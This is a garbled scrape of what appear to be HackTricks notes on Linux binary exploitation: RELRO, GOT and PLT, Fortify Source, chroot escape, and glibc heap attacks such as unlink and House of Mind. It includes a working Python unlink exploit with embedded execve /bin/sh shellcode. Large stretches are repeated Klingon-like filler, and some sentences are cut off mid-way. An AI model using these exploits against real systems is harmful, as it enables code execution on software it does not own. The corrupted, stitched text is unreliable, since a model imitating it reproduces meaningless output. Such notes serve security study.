jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhutlh 'e' vItlhutlh. relro jatlh 'e' vItlhut
gef➤ vmmap
Start End Offset Perm Path
0x0000000000400000 0x0000000000401000 0x0000000000000000 r-- /tmp/try
0x0000000000401000 0x0000000000402000 0x0000000000001000 r-x /tmp/try
0x0000000000402000 0x0000000000403000 0x0000000000002000 r-- /tmp/try
0x0000000000403000 0x0000000000404000 0x0000000000002000 r-- /tmp/try
0x0000000000404000 0x0000000000405000 0x0000000000003000 rw- /tmp/try
0x0000000000405000 0x0000000000426000 0x0000000000000000 rw- [heap]
0x00007ffff7dcb000 0x00007ffff7df0000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/libc-2.29.so
0x00007ffff7df0000 0x00007ffff7f63000 0x0000000000025000 r-x /usr/lib/x86_64-linux-gnu/libc-2.29.so
0x00007ffff7f63000 0x00007ffff7fac000 0x0000000000198000 r-- /usr/lib/x86_64-linux-gnu/libc-2.29.so
0x00007ffff7fac000 0x00007ffff7faf000 0x00000000001e0000 r-- /usr/lib/x86_64-linux-gnu/libc-2.29.so
0x00007ffff7faf000 0x00007ffff7fb2000 0x00000000001e3000 rw- /usr/lib/x86_64-linux-gnu/libc-2.29.so
0x00007ffff7fb2000 0x00007ffff7fb8000 0x0000000000000000 rw-
0x00007ffff7fce000 0x00007ffff7fd1000 0x0000000000000000 r-- [vvar]
0x00007ffff7fd1000 0x00007ffff7fd2000 0x0000000000000000 r-x [vdso]
0x00007ffff7fd2000 0x00007ffff7fd3000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/ld-2.29.so
0x00007ffff7fd3000 0x00007ffff7ff4000 0x0000000000001000 r-x /usr/lib/x86_64-linux-gnu/ld-2.29.so
0x00007ffff7ff4000 0x00007ffff7ffc000 0x0000000000022000 r-- /usr/lib/x86_64-linux-gnu/ld-2.29.so
0x00007ffff7ffc000 0x00007ffff7ffd000 0x0000000000029000 r-- /usr/lib/x86_64-linux-gnu/ld-2.29.so
0x00007ffff7ffd000 0x00007ffff7ffe000 0x000000000002a000 rw- /usr/lib/x86_64-linux-gnu/ld-2.29.so
0x00007ffff7ffe000 0x00007ffff7fff000 0x0000000000000000 rw-
0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack]
0xffffffffff600000 0xffffffffff601000 0x0000000000000000 r-x [vsyscall]
gef➤ p fgets
$2 = {char *(char *, int, FILE *)} 0x7ffff7e4d100 <_IO_fgets>
gef➤ search-pattern 0x7ffff7e4d100
[+] Searching '\x00\xd1\xe4\xf7\xff\x7f' in memory
[+] In '/tmp/try'(0x404000-0x405000), permission=rw-
0x404018 - 0x404030 → "\x00\xd1\xe4\xf7\xff\x7f[...]"
For the binary without relro, we can see that the got entry address for fgets is 0x404018. Looking at the memory mappings we see that it falls between 0x404000 and 0x405000, which has the permissions rw, meaning we can read and write to it. For the binary with relro, we see that the got table address for the run of the binary (pie is enabled so this address will change) is 0x555555557fd0. In that binary's memory mapping it falls between 0x0000555555557000 and 0x0000555555558000, which has the memory permission r, meaning that we can only read from it.
So what's the bypass? The typical bypass I use is to just don't write to memory regions that relro causes to be read only, and find a different way to get code execution.
Note that in order for this to happen the binary needs to know previous to execution the addresses to the functions:
- Lazy binding: The address of a function is searched the first time the function is called. So, the GOT needs to have write permissions during execution.
- Bind now: The addresses of the functions are solved at the begginig of the execution, then read-only permissions are given to sensitive sections like .got, .dtors, .ctors, .dynamic, .jcr.
`**-z relro**y**-z now`**
To check if a program uses Bind now you can do:
readelf -l /proc/ID_PROC/exe | grep BIND_NOW
/hive/hacktricks/exploiting/linux-exploiting-basic-esp/README.md
Hacking Techniques for Linux Exploitation (Basic ESP)
Descripción General
Cuando el binario es cargado en memoria y una función es llamada por primera vez se salta a la PLT (Procedure Linkage Table), de aquí se realiza un salto (jmp) a la GOT y descubre que esa entrada no ha sido resuelta (contiene una dirección siguiente de la PLT). Por lo que invoca al Runtime Linker o rtfd para que resuelva la dirección y la guarde en la GOT.
Cuando se llama a una función se llama a la PLT, esta tiene la dirección de la GOT donde se almacena la dirección de la función, por lo que redirige el flujo allí y así se llama a la función. Sin embargo, si es la primera vez que se llama a la función, lo que hay en la GOT es la siguiente instrucción de la PLT, por lo tanto el flujo sigue el código de la PLT (rtfd) y averigua la dirección de la función, la guarda en la GOT y la llama.
Al cargar un binario en memoria el compilador le ha dicho en qué offset tiene que situar datos que se deben de cargar cuando se corre el programa.
Lazy binding —> La dirección de la función se busca la primera vez que se invoca dicha función, por lo que la GOT tiene permisos de escritura para que cuando se busque, se guarde ahí y no haya que volver a buscarla.
Bind now —> Las direcciones de las funciones se buscan al cargar el programa y se cambian los permisos de las secciones .got, .dtors, .ctors, .dynamic, .jcr a solo lectura. -z relro y -z now
A pesar de esto, en general los programas no están complicados con esas opciones luego estos ataques siguen siendo posibles.
readelf -l /proc/ID_PROC/exe | grep BIND_NOW —> Para saber si usan el BIND NOW
Fortify Source -D_FORTIFY_SOURCE=1 o =2
Trata de identificar las funciones que copian de un sitio a otro de forma insegura y cambiar la función por una función segura.
Por ej:
char buf[16];
strcpy(but, source);
La identifica como insegura y entonces cambia strcpy() por __strcpy_chk() utilizando el tamaño del buffer como tamaño máximo a copiar.
La diferencia entre =1 o =2 es que:
La segunda no permite que %n venga de una sección con permisos de escritura. Además el parámetro para acceso directo de argumentos solo puede ser usado si se usan los anteriores, es decir, solo se pueda usar %3$d si antes se ha usado %2$d y %1$d
Para mostrar el mensaje de error se usa el argv[0], por lo que si se pone en el la dirección de otro sitio (como una variable global) el mensaje de error mostrará el contenido de dicha variable. Pag 191
Reemplazo de Libsafe
Se activa con: LD_PRELOAD=/lib/libsafe.so.2
o
“/lib/libsave.so.2” > /etc/ld.so.preload
Se interceptan las llamadas a algunas funciones inseguras por otras seguras. No está estandarizado. (solo para x86, no para compilaxiones con -fomit-frame-pointer, no compilaciones estaticas, no todas las funciones vulnerables se vuelven seguras y LD_PRELOAD no sirve en binarios con suid).
ASCII Armored Address Space
Consiste en cargar las librería compartidas de 0x00000000 a 0x00ffffff para que siempre haya un byte 0x00. Sin embargo, esto realmente no detiene a penas ningún ataque, y menos en little endian.
ret2plt
Consiste en realiza un ROP de forma que se llame a la función strcpy@plt (de la plt) y se apunte a la entrada de la GOT y se copie el primer byte de la función a la que se quiere llamar (system()). Acto seguido se hace lo mismo apuntando a GOT+1 y se copia el 2ºbyte de system()… Al final se llama la dirección guardada en GOT que será system()
Falso EBP
Para las funciones que usen el EBP como registro para apuntar a los argumentos al modificar el EIP y apuntar a system() se debe haber modificado el EBP también para que apunte a una zona de memoria que tenga 2 bytes cuales quiera y después la dirección a &”/bin/sh”.
Jaulas con chroot()
debootstrap -arch=i386 hardy /home/user —> Instala un sistema básico bajo un subdirectorio específico
Un admin puede salir de una de estas jaulas haciendo: mkdir foo; chroot foo; cd ..
Instrumentación de código
Valgrind —> Busca errores
Memcheck
RAD (Return Address Defender)
Insure++
8 Heap Overflows: Exploits básicos
Trozo asignado
prev_size |
size | —Cabecera
*mem | Datos
Trozo libre
prev_size |
size |
*fd | Ptr forward chunk
*bk | Ptr back chunk —Cabecera
*mem | Datos
Los trozos libres están en una lista doblemente enlazada (bin) y nunca pueden haber dos trozos libres juntos (se juntan)
En “size” hay bits para indicar: Si el trozo anterior está en uso, si el trozo ha sido asignado mediante mmap() y si el trozo pertenece al arena primario.
Si al liberar un trozo alguno de los contiguos se encuentra libre , estos se fusionan mediante la macro unlink() y se pasa el nuevo trozo más grande a frontlink() para que le inserte el bin adecuado.
unlink(){
BK = P->bk; —> El BK del nuevo chunk es el que tuviese el que ya estaba libre antes
FD = P->fd; —> El FD del nuevo chunk es el que tuviese el que ya estaba libre antes
FD->bk = BK; —> El BK del siguiente chunk apunta al nuevo chunk
BK->fd = FD; —> El FD del anterior chunk apunta al nuevo chunk
}
Por lo tanto si conseguimos modificar el P->bk con la dirección de un shellcode y el P->fd con la dirección a una entrada en la GOT o DTORS menos 12 se logra:
BK = P->bk = &shellcode
FD = P->fd = &__dtor_end__ - 12
FD->bk = BK -> *((&__dtor_end__ - 12) + 12) = &shellcode
Y así se se ejecuta al salir del programa la shellcode.
Además, la 4º sentencia de unlink() escribe algo y la shellcode tiene que estar reparada para esto:
BK->fd = FD -> *(&shellcode + 8) = (&__dtor_end__ - 12) —> Esto provoca la escritura de 4 bytes a partir del 8º byte de la shellcode, por lo que la primera instrucción de la shellcode debe ser un jmp para saltar esto y caer en unos nops que lleven al resto de la shellcode.
Por lo tanto el exploit se crea:
En el buffer1 metemos la shellcode comenzando por un jmp para que caiga en los nops o en el resto de la shellcode.
Después de la shell code metemos relleno hasta llegar al campo prev_size y size del siguiente trozo. En estos sitios metemos 0xfffffff0 (de forma que se sobrescrita el prev_size para que tenga el bit que dice que está libre) y “-4“(0xfffffffc) en el size (para que cuando compruebe en el 3º trozo si el 2º estaba libre en realidad vaya al prev_size modificado que le dirá que s´está libre) -> Así cuando free() investigue irá al size del 3º pero en realidad irá al 2º - 4 y pensará que el 2º trozo está libre. Y entonces llamará a unlink().
Al llamar a unlink() usará como P->fd los primeros datos del 2º trozo por lo que ahí se meterá la dirección que se quieres sobreescribir - 12(pues en FD->bk le sumará 12 a la dirección guardada en FD) . Y en esa dirección introducirá la segunda dirección que encuentre en el 2º shellcode += "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" \
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" \
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
prev_size = pack("<I”, 0xfffffff0) #Interesa que el bit que indica que el anterior trozo está libre esté a 1
fake_size = pack("<I”, 0xfffffffc) #-4, para que piense que el “size” del 3º trozo está 4bytes detrás (apunta a prev_size) pues es ahí donde mira si el 2º trozo está libre
addr_sc = pack("<I", 0x0804a008 + 8) #En el payload al principio le vamos a poner 8bytes de relleno
got_free = pack("<I", 0x08048300 - 12) #Dirección de free() en la plt-12 (será la dirección que se sobrescrita para que se lanza la shellcode la 2º vez que se llame a free)
payload = "aaaabbbb" + shellcode + "b"*(512-len(shellcode)-8) # Como se dijo el payload comienza con 8 bytes de relleno porque sí
payload += prev_size + fake_size + got_free + addr_sc #Se modifica el 2º trozo, el got_free apunta a donde vamos a guardar la direccion addr_sc + 12
os.system("./8.3.o " + payload)
unset() liberando en sentido inverso (wargame)
Estamos controlando 3 chunks consecutivos y se liberan en orden inverso al reservado.
En ese caso:
En el chunck c se pone el shellcode
El chunck a lo usamos para sobreescribir el b de forma que el el size tenga el bit PREV_INUSE desactivado de forma que piense que el chunck a está libre.
Además, se sobreescribe en la cabecera b el size para que valga -4.
Entonces, el programa se pensará que “a” está libre y en un bin, por lo que llamará a unlink() para desenlazarlo. Sin embargo, como la cabecera PREV_SIZE vale -4. Se pensará que el trozo de “a” realmente empieza en b+4. Es decir, hará un unlink() a un trozo que comienza en b+4, por lo que en b+12 estará el puntero “fd” y en b+16 estará el puntero “bk”.
De esta forma, si en bk ponemos la dirección a la shellcode y en fd ponemos la dirección a la función “puts()”-12 tenemos nuestro payload.
Técnica de Frontlink
Se llama a frontlink cuando se libera algo y ninguno de sus trozos contiguos no son libres, no se llama a unlink() sino que se llama directamente a frontlink().
Vulnerabilidad útil cuando el malloc que se ataca nunca es liberado (free()).
Necesita:
Un buffer que pueda desbordarse con la función de entrada de datos
Un buffer contiguo a este que debe ser liberado y al que se le modificará el campo fd de su cabecera gracias al desbordamiento del buffer anterior
Un buffer a liberar con un tamaño mayor a 512 pero menor que el buffer anterior
Un buffer declarado antes del paso 3 que permita sobreescribir el prev_size de este
De esta forma logrando sobres cribar en dos mallocs de forma descontrolada y en uno de forma controlada pero que solo se libera ese uno, podemos hacer un exploit.
Vulnerabilidad double free()
Si se llama dos veces a free() con el mismo puntero, quedan dos bins apuntando a la misma dirección.
En caso de querer volver a usar uno se asignaría sin problemas. En caso de querer usar otro, se le asignaría el mismo espacio por lo que tendríamos los punteros “fd” y “bk” falseados con los datos que escribirá la reserva anterior.
After free()
Un puntero previamente liberado es usado de nuevo sin control.
8 Heap Overflows: Exploits avanzados
Las técnicas de Unlink() and FrontLink() fueron eliminadas al modificar la función unlink().
The house of mind
Solo una llamada a free() es necesaria para provocar la ejecución de código arbitrario. Interesa buscar un segundo trozo que puede ser desbordado por uno anterior y liberado.
Una llamada a free() provoca llamar a public_fREe(mem), este hace:
mstate ar_ptr;
mchunkptr p;
…
p = mem2chunk(mes); —> Devuelve un puntero a la dirección donde comienza el trozo (mem-8)
…
ar_ptr = arena_for_chunk(p); —> chunk_non_main_arena(ptr)?heap_for_ptr(ptr)->ar_ptr:&main_arena [1]
…
_int_free(ar_ptr, mem);
}
En [1] comprueba el campo size el bit NON_MAIN_ARENA, el cual se puede alterar para que la comprobación devuelva true y ejecute heap_for_ptr() que hace un and a “mem” dejando a 0 los 2.5 bytes menos importantes (en nuestro caso de 0x0804a000 deja 0x08000000) y accede a 0x08000000->ar_ptr (como si fuese un struct heap_info)
De esta forma si podemos controlar un trozo por ejemplo en 0x0804a000 y se va a liberar un trozo en 0x081002a0 podemos llegar a la dirección 0x08100000 y escribir lo que queramos, por ejemplo 0x0804a000. Cuando este segundo trozo se libere se encontrará que heap_for_ptr(ptr)->ar_ptr devuelve lo que hemos escrito en 0x08100000 (pues se aplica a 0x081002a0 el and que vimos antes y de ahí se saca el valor de los 4 primeros bytes, el ar_ptr)
De esta forma se llama a _int_free(ar_ptr, mem), es decir, _int_free(0x0804a000, 0x081002a0)
_int_free(mstate av, Void_t* mem){
…
bck = unsorted_chunks(av);
fwd = bck->fd;
p->bk = bck;
p->fd = fwd;
bck->fd = p;
fwd->bk = p;
..}
Como hemos visto antes podemos controlar el valor de av, pues es lo que escribimos en el trozo que se va a liberar.
Tal y como se define unsorted_chunks, sabemos que:
bck = &av->bins[2]-8;
fwd = bck->fd = *(av->bins[2]);
fwd->bk = *(av->bins[2] + 12) = p;
Por lo tanto si en av->bins[2] escribimos el valor de __DTOR_END__-12 en la última instrucción se escribirá en __DTOR_END__ la dirección del segundo trozo.
Es decir, en el primer trozo tenemos que poner al inicio muchas veces la dirección de __DTOR_END__-12 porque de ahí la sacará av->bins[2]
En la dirección que caiga la dirección del segundo trozo con los últimos 5 ceros hay que escribir la dirección a este primer trozo para que heap_for_ptr() piense que el ar_ptr está al inicio del primer trozo y saque de ahí el av->bins[2]
En el segundo trozo y gracias al primero sobreescribimos el prev_size con un jump 0x0c y el size con algo para activar -> NON_MAIN_ARENA
A continuación en el trozo 2 ponemos un montón de nops y finalmente la shellcode
De esta forma se llamará a _int_free(TROZO1, TROZO2) y seguirá las instrucciones para escribir en __DTOR_END__ la dirección del prev_size del TROZO2 el cual saltará a la shellcode.
Para aplicar esta técnica hace Fastbin
QawHaq
Qa'Hom The House of Mind
ghu'vam 'e' vItlhutlh _int_free() pagh 'e' vItlhutlh'e'
fb = &(av->fastbins[fastbin_index(size)] —> fastbin_index(sz) —> (sz >> 3) - 2
…
p->fd = *fb
*fb = p
vaj vaj 'e' fb DaH 'e' vItlhutlh'e' 'e' GOT, 'e' vItlhutlh'e' 'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh'e' vItlhutlh tlhIngan Hol:
Dochvam'e' ghaH 'ej cha'logh mallocmey, vaj vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh 